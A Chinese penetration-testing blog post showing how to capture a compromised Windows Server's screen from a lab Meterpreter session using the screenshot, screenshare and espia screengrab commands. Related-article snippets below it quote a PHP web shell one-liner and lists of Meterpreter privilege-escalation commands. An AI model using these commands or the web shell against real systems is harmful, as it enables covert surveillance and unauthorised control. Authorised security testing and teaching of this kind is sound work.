12.5、后渗透测试--内网主机屏幕截图

渗透测试之屏幕截图技巧
最新推荐文章于 2023-10-31 21:09:28 发布
原创 最新推荐文章于 2023-10-31 21:09:28 发布 · 1.8k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#metasploit #meterpreter #屏幕操作

本文介绍了通过Kali Linux对Windows Server 2008 R2进行渗透测试时,利用Meterpreter工具的不同方法来捕获目标系统的屏幕截图,包括使用`screenshot`、`screenshare`命令及加载espia模块实现`screengrab`功能。
攻击主机: Kali 192.168.11.106
靶机:windows server 2008 r2  192.168.11.134
前提: 获得 meterpreter shell
操作屏幕的几种方式:
  1. screenshot
  2. screenshare
  3. 加载espia模块,使用screengrab

一、screenshot   截图

meterpreter > screenshot

二、screenshare  # 屏幕共享

使用命令之后会自动打开浏览器,并生成文件/usr/share/metasploit-framework/uDRIzzpV.html,可以直接浏览器打开。

三、加载espia模块,使用screengrab

功能:获取当前交互式桌面的屏幕截图,直接在浏览器中显示
meterpreter > use espia
meterpreter >  screengrab -h
meterpreter >  screengrab  screengrab.jpeg true
得到的jpeg是黑屏,没显示任何内容,不知道为啥。。。。

四、参考

kali linux远程控制
WeiMengPing_的博客
06-12 1985
为了防止黑客偷偷在计算机上安装远程控制被控端,我们通常会在计算机上安装杀毒软件,如我们都很熟悉的 360 卫等。试图将远程控制被控端植目标系统时,常常会被这些杀毒软件发现并阻止。长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也一直致力于研究避开检测的方法(简称为免杀技)术)。双方“各显神通”,一直在“魔高一尺,道高一丈,魔再高一丈”地发展着。
内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 6258
meterpreter使用攻略(持续更新中)
meterpreter常用命令
m0_52421380的博客
08-12 3940
MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。可以使用meterpreter自带的功能实现控制对方手机和电脑。nc,全称为NetworkConnection,是一种网络连接的工具,可以用来在两台计算机之间建立网络连接。
记录一次渗透测试全过程
weixin_30730151的博客
12-18 666
一、信息收集:   1、巡风扫漏洞看到一个80端口开放,上去看一看,任意文件上传。   2、巡风扫漏洞还看到一个phpmyadmin弱口令,版本很老。 二、任意文件上传:   1、上传php文件:  <?php @system($_GET("cmd")) ?> /* 合理合法过程要接受检查,不然还是传post,默认不记日志 上传路径在下载页面可以爆出...
python渗透测试入门之截屏
ailx10
06-25 420
近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第20个实验( 截屏),我的测试环境是windows虚拟机+conda开发环境+python3.7。这个实验非常有趣,在windows环境下,运行脚本就能自动截屏,我这边测试的时候发现,在虚拟机截屏不完整,可能和分辨率有关系~1、学生只需要在cmd中运行python脚本,即可产生桌面的截图2、可以在运...
这是一个很好用的屏幕截图软件
扣丁曼
04-07 549
集团内部没法联网,做材料,整汇报,经常需要使用截图功能。windows自带的截图一般人都用不好。我费劲九牛二虎之力找到一个满意局域网截图小软件。这是一个微信截图功能的抽离版本,和微信截图一模一样。链接:https://pan.baidu.com/s/1pOUGUSQZOhyX7TBvadQtig。–来自百度网盘超级会员V6的分享。下载后傻瓜式安装即可使用。瞧瞧这不就是微信的截图吗!
《Kali Linux2020 渗透测试指南》配套技术精讲
Ms08067安全实验室
11-10 1450
Kali是世界渗透测试行业公认的优秀的网络安全审计工具集合,它可以通过对设备的探测来审计它的安全性,而且功能极为完备,几乎包含了目前所有的热门工具。Kali的强大功能是毋庸置疑的,它几乎...
新书《Kali Linux2020 渗透测试指南》星球福利及最终目录&概要公布
Ms08067安全实验室
07-01 1484
Kali是世界渗透测试行业公认的优秀的网络安全审计工具集合,它可以通过对设备的探测来审计它的安全性,而且功能极为完备,几乎包含了目前所有的热门工具。Kali的强大功能是毋庸置疑的,它几乎...
.网络安全基础(面试)
m0_46101480的博客
10-31 601
浏览者在打开该页面的时候,这段代码执行,然后下载并执行某木马的服务端程序,进而控制浏览者的主机。挂网马的目的,让访问该网页的主机下载木马的服务器端程序,进而控制浏览者的主机。对于通信协议的选择,绝大多数木马使用的是TCP/IP协议,但也有使用UDP协议的木马。所以,做好木马的检测工作可以及时的发现以及处理木马,降低木马所带来的损失。当目标主机执行了木马的服务端程序之后,入侵者便可以通过客户端程序与目标主机上的服务端建立连接,进而控制主机。多线程是同步的,共享简单,同步复杂。多进程占用内存多,利用率低;
虚拟机(VMware12.5.2)下安装kali linux 2020,PS:“选择并安装软件“步骤报错?看这里
xuhc25的博客
03-06 3266
自定义标题一、kali linux简介二、Kali linux 安装1、创建虚拟机2、安装系统3、进入单用户模式修改root密码 一、kali linux简介 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通...
离线截图工具,无网络也可任意截图
09-12
此软件很小,主要是提取了QQ的截图功能,可实现无网络截图,欢迎下载
RSA创新沙盒盘点|BastionZero——零信任基础设施访问服务
weixin_44981569的博客
05-25 954
RSAConference2022将于旧金山时间6月6日召开。大会的Innovation Sandbox(沙盒)大赛作为“安全圈的奥斯卡”,每年都备受瞩目,成为全球网络安全行业技术创新和投资的风向标。 前不久,RSA官方宣布了最终入选创新沙盒的十强初创公司:Araali Networks、BastionZero、Cado Security、Cycode、Dasera、Lightspin、Neosec、Sevco Security、Talon Cyber Security和Torq。 绿盟君将通过背景介绍、产
渗透测试完整流程(未完待续)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 1906
目录 信息收集 渗透测试流程图 什么是渗透测试渗透测试就是利用我们所掌握的网络安全知识,对目标网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后编写一篇测试报告,提供给我们的客户。客户根据测试报告,对网站进行漏洞修补,以防止被黑客的入侵服务器,造成不可估量的损失! 开始一次渗透测试前,一定要确保我们的所有渗透测试目标,都已经拿到了客户的授权。如果没有拿到授权就对一个网站进行测试,《网络安全法》了解一下 渗透测试可分为白盒测试和黑盒测试 白盒测试: 白盒测试就是客户给我们
三流安全工程师的渗透测试记录
Javachichi的博客
10-31 1290
熟悉笔者的朋友都知道,我目前在测评机构做专职渗透测试,平常的工作也只是侧重于验证漏洞存在即可,并不太涉及对漏洞的深入利用以及实际能产生的危害。但作为渗透爱好者,怎么可能仅仅满足于此。在时间、条件允许的情况下,我会在测评对象的范围内尽可能地找出高危,追求getshell,把客户系统当作靶场来搞(狗头)。本文记录了最近一段时间在工作中遇到的一些漏洞(相关漏洞目前均已修复,相关截图均已进行脱敏处理),没啥技术含量,纯脚本小子有手就行,大佬勿喷。
渗透测试Metasploit
11-20
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
Meterpreter的常用命令合集
妖魔鬼怪快离开的博客
11-25 1万+
getsystem #会自动利用各种各样的系统漏洞来进行权限提升 migrate #进程id进程迁移 background #把当前的会话设置为背景,需要的时候在启用 getuid #查看对方正在运行的用户 ps #列出所有的进程 getpid #返回运行meterpreter的id号 sysinfo #产看系统信息和体系结构 shell #切换到cmd的系统权限方式 e
Meterpreter命令详解
热门推荐
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值